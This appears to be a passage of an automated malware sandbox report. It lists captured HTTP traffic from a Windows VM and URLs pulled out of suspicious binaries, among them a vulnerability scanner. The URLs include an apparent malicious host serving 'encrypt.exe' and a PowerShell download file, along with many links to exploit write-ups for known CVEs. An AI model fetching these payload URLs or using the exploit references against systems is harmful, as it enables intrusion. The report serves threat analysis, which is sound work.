          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.27716.00; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4659Host: login.live.com
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4794Host: login.live.com
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4796Host: login.live.com
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4796Host: login.live.com
          Source: global trafficHTTP traffic detected: GET /proactive/v2/spark?cc=US&setLang=en-US HTTP/1.1X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-Device-IsBatteryCertified: falseX-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-Device-IsBatteryEnabled: falseX-Device-NetworkType: ethernetX-BM-DTZ: -420X-BM-FirstEnabledTime: 132061395240662859X-DeviceID: 0100748C0900F661X-VoiceActivationOn: falseX-Device-AudioCapture: Microphone (High Definition Audio Device)X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDgAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAQu6GTFrNWvnx/6mkNZl7EYZBgAOAVvTU1YEGPx%2B9UmE25nRF6nASWESBppCXi/0FaDRJ77ZOkvmiByX0kY3/wFepGjPR9GcGu8UT2rwV6gj0IEOmLSbtJn4McGB1o4MVttpvOW9rGGK8oE63U78iYgrh2XPhLUR012oWM5tKmpQu2R1P6/QUWAop//HqG8hK2odcvrjXxF0mOUrYYXoz9zhWlkypEas%2BF7/nUrB8IWbgOe3uVzztfIHmx5naIkOwdo2OkgNP1ph/akMvcSPjLQvVWSkocaohVL9QAUvDpij1gZvhv0WaVG4Qmdd/%2Bi3/9KcHwZF6JVS1YVUeSzeyVUDZgAACAUexxILvs2wsAEio1PYwyKuG03er9lRLKaZn8brD4QoPqWJMdA41%2B3SWGiDu4vgv%2BTHDBD1WDtUU9twHyYt4DTa5i1BlEqlDb9t9%2BpkNOASQ6/Ur2o6y4QiyMQ0By07Y5FCJUHahAcqFsRrebed09beCE02JKc4GFSAelXc2IjGfuJ%2BSHPg4wXUjyco%2BOH32KuY3QPdtqjFMbwgJfg5cgGJlYslyB7izaJkNWQPiXXfunOxpHTQTkte5cP/eNXRBY4fodWXbxZcS6jJNMOWzejvqk6PZS6E5%2B40iCjlIZed3MTEpE37NjMTXbJetZyonLh44rMyOGoFQbPeafcG5A6BV0Vgf6jHddiJ/IcNUzJ/e5K1hAdwMS60SRAXwOxnIJHAXjRCDFQLIow%2BjUAP5GDMl1Nm77pdO8z%2BKwpWu7%2BojHn%2BZweEfdrXMww%2B9JT3jw7oJKu74brZVaEKAllotZZOR32EhwqFhLmgreM6elniCTLxaJi1kZPLPR1i8y9tnTZZncs8fPsmty4Hg%2BZGiLU9A49XBeAQ4yoks62OKkqbp6gbVZvJo/wB0BWJZOapZHrz%2BfcdfsQgZKbZAQ%3D%3D%26p%3DX-Agent-DeviceId: 0100748C0900F661X-BM-CBT: 1660406776User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134X-Device-isOptin: trueAccept-language: en-US, enX-Device-IsEnergyHero: falseX-Device-Touch: falseX-Device-ClientSession: 3D03616141EB407B8D13A46D34A66D26X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderHost: www.bing.comConnection: Keep-AliveCookie: MUID=7E1F7E3AB9E24BF9AA0D8F6664CA6F63
          Source: global trafficHTTP traffic detected: GET /client/config?cc=US&setlang=en-US HTTP/1.1X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061395240662859X-DeviceID: 0100748C0900F661X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDgAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAQu6GTFrNWvnx/6mkNZl7EYZBgAOAVvTU1YEGPx%2B9UmE25nRF6nASWESBppCXi/0FaDRJ77ZOkvmiByX0kY3/wFepGjPR9GcGu8UT2rwV6gj0IEOmLSbtJn4McGB1o4MVttpvOW9rGGK8oE63U78iYgrh2XPhLUR012oWM5tKmpQu2R1P6/QUWAop//HqG8hK2odcvrjXxF0mOUrYYXoz9zhWlkypEas%2BF7/nUrB8IWbgOe3uVzztfIHmx5naIkOwdo2OkgNP1ph/akMvcSPjLQvVWSkocaohVL9QAUvDpij1gZvhv0WaVG4Qmdd/%2Bi3/9KcHwZF6JVS1YVUeSzeyVUDZgAACAUexxILvs2wsAEio1PYwyKuG03er9lRLKaZn8brD4QoPqWJMdA41%2B3SWGiDu4vgv%2BTHDBD1WDtUU9twHyYt4DTa5i1BlEqlDb9t9%2BpkNOASQ6/Ur2o6y4QiyMQ0By07Y5FCJUHahAcqFsRrebed09beCE02JKc4GFSAelXc2IjGfuJ%2BSHPg4wXUjyco%2BOH32KuY3QPdtqjFMbwgJfg5cgGJlYslyB7izaJkNWQPiXXfunOxpHTQTkte5cP/eNXRBY4fodWXbxZcS6jJNMOWzejvqk6PZS6E5%2B40iCjlIZed3MTEpE37NjMTXbJetZyonLh44rMyOGoFQbPeafcG5A6BV0Vgf6jHddiJ/IcNUzJ/e5K1hAdwMS60SRAXwOxnIJHAXjRCDFQLIow%2BjUAP5GDMl1Nm77pdO8z%2BKwpWu7%2BojHn%2BZweEfdrXMww%2B9JT3jw7oJKu74brZVaEKAllotZZOR32EhwqFhLmgreM6elniCTLxaJi1kZPLPR1i8y9tnTZZncs8fPsmty4Hg%2BZGiLU9A49XBeAQ4yoks62OKkqbp6gbVZvJo/wB0BWJZOapZHrz%2BfcdfsQgZKbZAQ%3D%3D%26p%3DX-Agent-DeviceId: 0100748C0900F661X-BM-CBT: 1660406775User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134X-Device-isOptin: trueAccept-language: en-US, enX-Device-Touch: falseX-Device-ClientSession: 3D03616141EB407B8D13A46D34A66D26X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderHost: www.bing.comConnection: Keep-AliveCookie: MUID=7E1F7E3AB9E24BF9AA0D8F6664CA6F63
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://%s.%sillegal
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://0day5.com/archives/4249/
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://127.0.0.1:8080in
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://127.0.0.1:8080sql:
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://127.0.0.1:id:
          Source: PowerShell_transcript.179605.7QwF43q_.20220813090656.txt.16.drString found in binary or memory: http://212.87.212.218/doanlowd.txt
          Source: jxatBamQnK.exe, 00000000.00000003.387139260.000000C0000CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://212.87.212.218/encrypt.exe
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://212.87.212.218/id:
          Source: daemon.exeString found in binary or memory: http://212.87.212.218/idna:
          Source: scan.exeString found in binary or memory: http://api.ceye.io/v1/records?token=%s&type=dns&filter=%sonly
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://cve-2018-7600-8-x.vulnet:8080/
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ggg.cpdd:80
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://jellyfin.org
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://print1n.top)
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://webkiller.cn/)
          Source: scan.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%B
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.bt.cn/bbs)(Kubernetes
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.rejetto.com/hfs/)177635683940025046467781066894531252006-01-02
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.tongda2000.com
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.xdoa.cn
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://wx.weaver)(
          Source: scan.exeString found in binary or memory: https://about.gitlab.com/)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://blog.csdn.net/qq_36374896/article/details/84839891
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://blog.csdn.net/xuandao_ahfengren/article/details/111402955
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6
          Source: scan.exeString found in binary or memory: https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9d
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/B1anda0)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/LandGrey/flink-unauth-rce
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/MrPointSun)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/NS-Sp4ce/Inspur
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/bufsnake)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/chaosec2021
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/dreadlocked/Drupalgeddon2
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/hanxiansheng26)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/harris2015)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/j4ckzh0u)
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh
          Source: scan.exeString found in binary or memory: https://github.com/neverendxxxx
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/neverendxxxxxx)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/shmilylty)
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdname:
          Source: scan.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/maste
          Source: scan.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533name:
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841name:
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rcename:
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://hackfun.org/)
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://hub.docker.com/r/petergrace/opentsdb-dockername:
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://medium.com/
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mp.weixin.qq.com/s/taEEl6UQ2yi4cqzs2UBfCg
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c7
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b92
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-7980
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2022-26134
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://paper.seebug.org/567/
          Source: scan.exeString found in binary or memory: https://phyb0x.github.
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/nam
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://print1n.top)
          Source: scan.exeString found in binary or memory: https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%8D%E5%8F%B0%E
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://s.tencent.com/research/bsafe/1228.html
          Source: scan.exeString found in binary or memory: https://shells.systems/pandorafms-v7-0ng-a
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.anquanke.com/post/id/187923
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.cnblogs.com/test404/p/7397755.htmlname:
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.freebuf.com/column/214946.htmlname:
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.hackbug.net/archives/111.html
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.jianshu.com/p/8d878330a42f
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabili
          Source: scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.zhihuifly.com/t/topic/3118
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xz.aliyun.com/t/2224
          Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220308T161834Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4bad966783af4e32bdf64b1a321783c7&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418173&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=VMware7%2C1&tl=2&tsu=1418173&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6Cache-Control: no-cacheMS-CV: 2FQJG+OfpkWM/bI6.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220308T161834Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=597682d23c7d4ea5a0eb32e465ddbc62&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418173&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1418173&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6Cache-Control: no-cacheMS-CV: 2FQJG+OfpkWM/bI6.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /proactive/v2/spark?cc=US&setLang=en-US HTTP/1.1X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-Device-IsBatteryCertified: falseX-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-Device-IsBatteryEnabled: falseX-Device-NetworkType: ethernetX-BM-DTZ: -420X-BM-FirstEnabledTime: 132061395240662859X-DeviceID: 0100748C0900F661X-VoiceActivationOn: falseX-Device-AudioCapture: Microphone (High Definition Audio Device)X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDgAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAQu6GTFrNWvnx/6mkNZl7EYZBgAOAVvTU1YEGPx%2B9UmE25nRF6nASWESBppCXi/0FaDRJ77ZOkvmiByX0kY3/wFepGjPR9GcGu8UT2rwV6gj0IEOmLSbtJn4McGB1o4MVttpvOW9rGGK8oE63U78iYgrh2XPhLUR012oWM5tKmpQu2R1P6/QUWAop//HqG8hK2odcvrjXxF0mOUrYYXoz9zhWlkypEas%2BF7/nUrB8IWbgOe3uVzztfIHmx5naIkOwdo2OkgNP1ph/akMvcSPjLQvVWSkocaohVL9QAUvDpij1gZvhv0WaVG4Qmdd/%2Bi3/9KcHwZF6JVS1YVUeSzeyVUDZgAACAUexxILvs2wsAEio1PYwyKuG03er9lRLKaZn8brD4QoPqWJMdA41%2B3SWGiDu4vgv%2BTHDBD1WDtUU9twHyYt4DTa5i1BlEqlDb9t9%2BpkNOASQ6/Ur2o6y4QiyMQ0By07Y5FCJUHahAcqFsRrebed09beCE02JKc4GFSAelXc2IjGfuJ%2BSHPg4wXUjyco%2BOH32KuY3QPdtqjFMbwgJfg5cgGJlYslyB7izaJkNWQPiXXfunOxpHTQTkte5cP/eNXRBY4fodWXbxZcS6jJNMOWzejvqk6PZS6E5%2B40iCjlIZed3MTEpE37NjMTXbJetZyonLh44rMyOGoFQbPeafcG5A6BV0Vgf6jHddiJ/IcNUzJ/e5K1hAdwMS60SRAXwOxnIJHAXjRCDFQLIow%2BjUAP5GDMl1Nm77pdO8z%2BKwpWu7%2BojHn%2BZweEfdrXMww%2B9JT3jw7oJKu74brZVaEKAllotZZOR32EhwqFhLmgreM6elniCTLxaJi1kZPLPR1i8y9tnTZZncs8fPsmty4Hg%2BZGiLU9A49XBeAQ4yoks62OKkqbp6gbVZvJo/wB0BWJZOapZHrz%2BfcdfsQgZKbZAQ%3D%3D%26p%3DX-Agent-DeviceId: 0100748C0900F661X-BM-CBT: 1660406776User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 